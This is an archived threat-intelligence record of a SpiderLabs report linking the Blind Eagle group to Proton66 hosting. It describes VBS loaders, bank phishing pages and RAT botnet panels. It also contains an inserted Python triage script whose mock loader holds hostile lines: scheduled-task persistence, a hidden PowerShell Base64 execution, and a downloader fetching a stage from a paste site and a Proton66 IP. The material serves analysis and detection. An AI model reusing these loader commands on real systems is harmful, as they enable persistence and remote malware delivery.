{
	"id": "206a5670-a1b7-4dd1-95af-cd8549a7a8aa",
	"created_at": "2026-04-29T02:20:35.386141Z",
	"updated_at": "2026-04-29T08:23:11.982683Z",
	"deleted_at": null,
	"sha1_hash": "44d0012ed7e23b8adb4e2ffa363b8277b1c05414",
	"title": "Tracing Blind Eagle to Proton66",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 3015774,
	"plain_text": "Tracing Blind Eagle to Proton66\r\nBy Serhii Melnyk\r\nPublished: 2025-06-27 · Archived: 2026-04-29 02:11:13 UTC\r\nTrustwave SpiderLabs has assessed with high confidence that the threat group Blind Eagle, aka APT-C-36, is associated with the Russian bulletproof hosting service provider Proton66. Blind Eagle is a threat actor actively targeting organizations across Latin America, with a notable focus on Colombian financial institutions.\r\nTrustwave SpiderLabs, which has been tracking Proton66 for the last several months, made this connection by pivoting from Proton66-linked assets, which led to the identification of another active threat cluster relying on the same ASN infrastructure.\r\nPivoting identified what is assessed to be one of Blind Eagle's most recent and operationally active infrastructure clusters, characterized by strong interconnections across multiple domains and IP address ranges. This infrastructure exclusively leverages Visual Basic Script (VBS) files as its initial attack vector, relies heavily on free Dynamic DNS (DDNS) services, and deploys readily available Remote Access Trojans (RATs) as second-stage malware.\r\nThe starting pivot point of this analysis within Proton66 OOO infrastructure was a set of domains following a common naming pattern that began appearing in summer 2024. These domains all resolved to the IP address 45.135.232[.]38, which is part of a netblock associated with Proton66 OOO.\r\nhttps://www.levelblue.com/blogs/spiderlabs-blog/tracing-blind-eagle-to-proton66/\r\nPage 1 of 13\n\nFigure 1. DuckDNS.org domain registrations with a similar naming pattern, starting on August 12, 2024.\r\nThe domains in question were used to host a variety of malicious content, including phishing pages and VBS scripts that serve as the initial stage of malware deployment. 
These scripts act as loaders for second-stage tools, which, in this campaign, are limited to publicly available and often open-source RATs. Notably, an analysis of some of the VBS code also revealed overlaps with previously analyzed samples generated by Vbs-Crypter, linked to “Crypters and Tools”, a subscription-based service. This crypter is commonly used to obfuscate and pack VBS payloads, hindering static detection. The presence of such artifacts suggests that the threat actors behind this campaign used the service to generate their loaders.\r\nFigure 2. “Crypters And Tools” Telegram advertisement.\r\nDespite the potentially high-value targeting, there is little evidence that the threat actors made a concerted effort to obscure their infrastructure. On the contrary, numerous open directories (opendirs) were discovered throughout the infrastructure, many of which hosted identical malicious files. In the more egregious cases, these directories contained complete phishing pages impersonating legitimate Colombian banks and financial institutions, along with the first-stage malware used to initiate the infection. In one of the identified clusters, the threat actors created phishing pages impersonating several well-known Colombian financial institutions, including Bancolombia, BBVA, Banco Caja Social, and Davivienda.\r\nFigure 3. Bancolombia phishing page.\r\nFigure 4. Davivienda phishing page.\r\nThese phishing sites were designed to harvest user credentials and other sensitive information. The sites include HTML, CSS, and image files that replicate the appearance of legitimate banking login portals. 
In addition to the phishing pages, this specific set of infrastructure also hosted various VBS scripts that serve as the first stage of malware deployment. Notable identified samples include download-and-run scripts that retrieve encrypted executable files from a remote server.\r\nFigure 5. Code example that checks whether the VBS file is running with administrative privileges and, if not, uses Windows scripting methods to re-execute itself with elevated permissions. Upon successful elevation, it adds a Microsoft Defender exclusion for the entire C:\\ drive.\r\nFigure 6. Code example that deletes Windows Registry keys related to COM/ActiveX classes (Software\\Classes), component identifiers (CLSID) and WOW6432Node paths, as a cleanup step.\r\nWhile some scripts have a distinct, narrow purpose, the majority work solely as a first-stage loader for the same selection of commodity second-stage RATs and follow the same pattern. After stripping the 6,000 to 20,000 lines of each sample, most of which are comments, the first part of most loaders creates a scheduled task:\r\nFigure 7. \"schtasks /create /tn coJb /tr \"%TEMP%\\GLPd.vbs\" /sc minute /mo 1\" example within one of the VBS samples; the task re-runs the dropped script every minute.\r\nThe second part decodes a Base64 string, which is then executed via PowerShell:\r\nFigure 8. Deobfuscated and decoded example.\r\nIt then downloads the next payload from services such as paste.ee, textbin.net and store3.gofile.io, or directly from IPv4 addresses:\r\nFigure 9. 
Examples with hxxps://paste[.]ee/r/jNJfecjT/0, hosted on hxxps://textbin[.]net/raw/xsi2eulwpw.\r\nThe next payload is typically a file with an MZ header that is renamed, in this case to dll02.txt. This DLL loads the final payload, which is downloaded from another URL as another Base64 string that also decodes to an MZ file. The pattern concludes with the final payloads, which for this specific cluster are either Remcos or AsyncRAT; these then establish command and control (C2) with the management panel.\r\nFigure 10. Deobfuscated example.\r\nIn one observed case, such a web-based botnet panel featured a user interface written in Brazilian Portuguese and included a fully functional dashboard used to manage compromised hosts. This panel contained victim logs, deployment paths for initial-stage droppers, and links to the same publicly accessible, open-source RAT payloads, specifically AsyncRAT variants.\r\nFigure 11. Botnet panel dashboard showing a list of infected machines (264 at the time of analysis, primarily based in Argentina) and four buttons/options in the last column to manage them.\r\nThe botnet management interface allows operators to control infected machines, retrieve exfiltrated data, and interact with infected endpoints through a broad set of capabilities typically found in commodity RAT management suites.\r\nFigures 12 and 13. 
Contextual control options displayed after selecting an individual victim within the botnet panel interface, showing the range of post-compromise actions available to the operator, including command execution, file exfiltration, and payload deployment from a specified URL.\r\nThe level of access provided through the exposed botnet panel illustrates the operational simplicity of the campaign and reinforces how little emphasis the threat actors placed on infrastructure compartmentalization or concealment, a clear sign that they prioritize rapid deployment and accessibility over stealth or long-term sustainability. Each component of the infrastructure, including malware hosting servers, C2 panels, and phishing-related files, is hosted on domains that exhibit consistent naming patterns, TLS certificate reuse, and shared artifacts. Whether due to oversight or intent, many components, including the C2 panel and VBS files shown above, were publicly accessible via open directories with no segmentation between them.\r\nThis ongoing activity underscores how unsophisticated threat infrastructure can still result in successful compromises, particularly when paired with phishing lures tailored to specific regional targets. While Colombian financial institutions remain a primary focus, the broader pattern suggests an increasing capability to scale operations across the Latin American (LATAM) region.\r\nOrganizations in LATAM, especially within the financial sector, should maintain heightened vigilance around banking-themed emails, enforce robust email filtering, and regularly train staff to identify localized phishing techniques. 
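The loader chain described above (a comment-padded VBS file, a schtasks persistence command, a Base64 blob handed to PowerShell, and a next stage fetched from a paste service or a bare IPv4 address) can be triaged statically before any detonation. The Python script below is an added example written for this page, not code from the original post or from the SpiderLabs team. The loader it parses is constructed for the example: the paste.ee path and the file path under the IP are placeholders, and the comment-stripping, scheduled-task and Base64 heuristics are this example's own rather than detection logic from the report. Only the 45.135.232[.]38 address, the dll02.txt name, the coJb task name, the GLPd.vbs drop path and the paste hosts come from the report.

```python
import base64
import binascii
import re

# Constructed sample (not a real loader): junk comment lines, a schtasks
# persistence line and a Base64 blob handed to PowerShell, which in turn pulls
# the next stage from a paste site and a bare IPv4 address. The paste.ee path
# and the file path under the IP are placeholders.
STAGE2_PS = (
    '$u = \"https://paste.ee/r/EXAMPLEID/0\";'
    '$c = \"http://45.135.232.38/dll02.txt\";'
    '$b = [Convert]::FromBase64String((New-Object Net.WebClient).DownloadString($u));'
    '[IO.File]::WriteAllBytes([IO.Path]::Combine($env:TEMP, \"dll02.txt\"), $b);'
)
VBS_TEMPLATE = '''Rem padding comment, repeated thousands of times in real samples
' the other VBS comment style
Set oShell = CreateObject(\"WScript.Shell\")
oShell.Run \"schtasks /create /tn coJb /tr \"\"%TEMP%\\GLPd.vbs\"\" /sc minute /mo 1\", 0, False
Rem second part: decode the blob and hand it to PowerShell
oShell.Run \"powershell -w hidden -c iex([Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('__B64__')))\", 0, False
'''

def build_sample() -> str:
    blob = base64.b64encode(STAGE2_PS.encode()).decode()
    return VBS_TEMPLATE.replace('__B64__', blob)

# Heuristics are this example's own, not detection logic from the report.
TASK_RE = re.compile('schtasks\\s+/create.*?/tn\\s+(\\S+).*?/sc\\s+(\\w+)(?:.*?/mo\\s+(\\d+))?', re.IGNORECASE)
B64_RE = re.compile('[A-Za-z0-9+/]{64,}={0,2}')
URL_RE = re.compile('https?://[A-Za-z0-9._~:/?#@!$&()*+,;=%-]+', re.IGNORECASE)
IPV4_RE = re.compile('(?<![0-9.])[0-9]{1,3}(?:[.][0-9]{1,3}){3}(?![0-9.])')
PASTE_HOSTS = ('paste.ee', 'textbin.net', 'store3.gofile.io')  # hosts named in the report
WATCHLIST = {'45.135.232.38': 'Proton66 OOO netblock (per the report)'}
APOSTROPHE = chr(39)  # the VBS single-quote comment marker

def strip_comments(vbs: str) -> list:
    # Real samples carry 6,000 to 20,000 lines, most of them comments.
    kept = []
    for line in vbs.splitlines():
        s = line.strip()
        if not s or s.startswith(APOSTROPHE) or s.lower().startswith('rem '):
            continue
        kept.append(s)
    return kept

def find_scheduled_tasks(lines: list) -> list:
    tasks = []
    for line in lines:
        m = TASK_RE.search(line)
        if m:
            tasks.append({'name': m.group(1), 'schedule': m.group(2).lower(), 'modifier': m.group(3)})
    return tasks

def classify_bytes(raw: bytes) -> str:
    # pe: MZ header (a dll02.txt style stage); text: a decoded script stage.
    if raw[:2] == b'MZ':
        return 'pe'
    try:
        text = raw.decode('utf-8')
    except UnicodeDecodeError:
        return 'binary'
    return 'text' if all(ch.isprintable() or ch.isspace() for ch in text) else 'binary'

def decode_blobs(lines: list) -> list:
    stages = []
    for m in B64_RE.finditer(' '.join(lines)):
        try:
            raw = base64.b64decode(m.group(0), validate=True)
        except binascii.Error:
            continue
        stages.append((classify_bytes(raw), raw))
    return stages

def triage(vbs: str) -> dict:
    lines = strip_comments(vbs)
    stages = decode_blobs(lines)
    # Search the loader and every decoded text stage for network indicators.
    corpus = ' '.join(lines) + ' ' + ' '.join(raw.decode('utf-8') for kind, raw in stages if kind == 'text')
    urls = sorted(set(URL_RE.findall(corpus)))
    ips = sorted(set(IPV4_RE.findall(corpus)))
    return {
        'tasks': find_scheduled_tasks(lines),
        'stage_kinds': [kind for kind, _ in stages],
        'urls': urls,
        'paste_urls': [u for u in urls if any(h in u for h in PASTE_HOSTS)],
        'ips': ips,
        'watchlist_hits': {ip: WATCHLIST[ip] for ip in ips if ip in WATCHLIST},
    }

if __name__ == '__main__':
    import json
    print(json.dumps(triage(build_sample()), indent=2))
```

Run it as a script to print the report for the built-in sample, or pass the text of a real loader to triage(). The stage classification (pe, text or binary) separates a decoded PowerShell downloader from an MZ payload such as dll02.txt, and the watchlist lookup is where a team would plug in its own list of Proton66 ranges once it has them; the report gives only the single address, so the example does not guess at a prefix.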
Organizations can also benefit from using advanced email filtering solutions like Trustwave MailMarshal to detect and block malicious emails that may contain harmful attachments or links. Proactive monitoring for regionally targeted infrastructure and threat indicators can significantly reduce the risk of compromise.\r\nIoC\r\nSource: https://www.levelblue.com/blogs/spiderlabs-blog/tracing-blind-eagle-to-proton66/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://www.levelblue.com/blogs/spiderlabs-blog/tracing-blind-eagle-to-proton66/"
	],
	"report_names": [
		"tracing-blind-eagle-to-proton66"
	],
	"threat_actors": [
		{
			"id": "98b22fd7-bf1b-41a6-b51c-0e33a0ffd813",
			"created_at": "2022-10-25T15:50:23.688973Z",
			"updated_at": "2026-04-29T06:58:57.691272Z",
			"deleted_at": null,
			"main_name": "APT-C-36",
			"aliases": [
				"APT-C-36",
				"Blind Eagle",
				"TAG-144",
				"AguilaCiega",
				"APT-Q-98"
			],
			"source_name": "MITRE:APT-C-36",
			"tools": [
				"njRAT",
				"Imminent Monitor",
				"DCRAT",
				"PureCrypter",
				"Caminho",
				"Remcos",
				"AsyncRAT",
				"QuasarRAT",
				"HeartCrypt"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "be597b07-0cde-47bc-80c3-790a8df34af4",
			"created_at": "2022-10-25T16:07:23.407484Z",
			"updated_at": "2026-04-29T06:58:57.790051Z",
			"deleted_at": null,
			"main_name": "Blind Eagle",
			"aliases": [
				"APT-C-36",
				"APT-Q-98",
				"AguilaCiega",
				"G0099"
			],
			"source_name": "ETDA:Blind Eagle",
			"tools": [
				"AsyncRAT",
				"BitRAT",
				"Bladabindi",
				"BlotchyQuasar",
				"Imminent Monitor",
				"Imminent Monitor RAT",
				"Jorik",
				"LimeRAT",
				"Remcos",
				"RemcosRAT",
				"Remvio",
				"Socmer",
				"Warzone",
				"Warzone RAT",
				"njRAT"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "bd43391b-b835-4cb3-839a-d830aa1a3410",
			"created_at": "2023-01-06T13:46:38.925525Z",
			"updated_at": "2026-04-29T06:58:56.373654Z",
			"deleted_at": null,
			"main_name": "APT-C-36",
			"aliases": [
				"Blind Eagle"
			],
			"source_name": "MISPGALAXY:APT-C-36",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1777429235,
	"ts_updated_at": 1777450991,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/44d0012ed7e23b8adb4e2ffa363b8277b1c05414.pdf",
		"text": "https://archive.orkl.eu/44d0012ed7e23b8adb4e2ffa363b8277b1c05414.txt",
		"img": "https://archive.orkl.eu/44d0012ed7e23b8adb4e2ffa363b8277b1c05414.jpg"
	}
}